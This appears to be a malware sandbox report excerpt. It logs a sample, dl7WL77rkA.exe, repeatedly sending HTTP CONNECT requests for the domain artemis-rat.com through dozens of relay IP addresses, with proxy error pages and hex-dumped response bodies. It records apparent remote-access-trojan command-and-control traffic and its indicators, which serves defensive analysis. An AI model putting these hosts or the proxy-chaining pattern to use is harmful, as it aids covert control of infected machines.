                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2012192.168.2.554531206.220.175.241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.580033064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2013192.168.2.551933182.53.178.16980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.581043005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.213829041 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2014192.168.2.551937121.101.131.6711113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.585273027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592639923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2015192.168.2.555411146.56.154.83210003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.586790085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.554122925 CET55INHTTP/1.1 0 Connection establish problem (read logs)
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:06.064986944 CET55INHTTP/1.1 0 Connection establish problem (read logs)
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:07.857122898 CET55INHTTP/1.1 0 Connection establish problem (read logs)
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:11.665221930 CET55INHTTP/1.1 0 Connection establish problem (read logs)
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:18.832967043 CET55INHTTP/1.1 0 Connection establish problem (read logs)
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:33.169048071 CET55INHTTP/1.1 0 Connection establish problem (read logs)
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:01.841041088 CET55INHTTP/1.1 0 Connection establish problem (read logs)


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2016192.168.2.55545112.186.205.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.607465029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.796958923 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2017192.168.2.553927118.163.120.181588373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.607533932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.608232975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717896938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.811491013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:10.527944088 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.528377056 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.549166918 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:31.586905956 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:55.665580034 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:43.740575075 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:34:19.891601086 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2018192.168.2.5554108.217.143.187156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.608094931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2019192.168.2.554019162.214.227.68550293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.608424902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.201998949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2020192.168.2.55540531.170.22.12710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.613167048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2021192.168.2.555440212.110.188.213344113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.618300915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.311294079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.217921972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108208895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.717664957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.014305115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2022192.168.2.55540247.100.236.2380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.621052980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.960865974 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2023192.168.2.5553988.219.228.100156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.622059107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2024192.168.2.555397123.116.119.175813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.624398947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2025192.168.2.55541891.189.177.18631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.633934975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.963453054 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/5.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3628
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from lb1
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from lb1:3128
                                                                                                                                                                                                                                                            Via: 1.1 lb1 (squid/5.7)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2026192.168.2.555415221.231.13.19810803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.645323038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.984956026 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
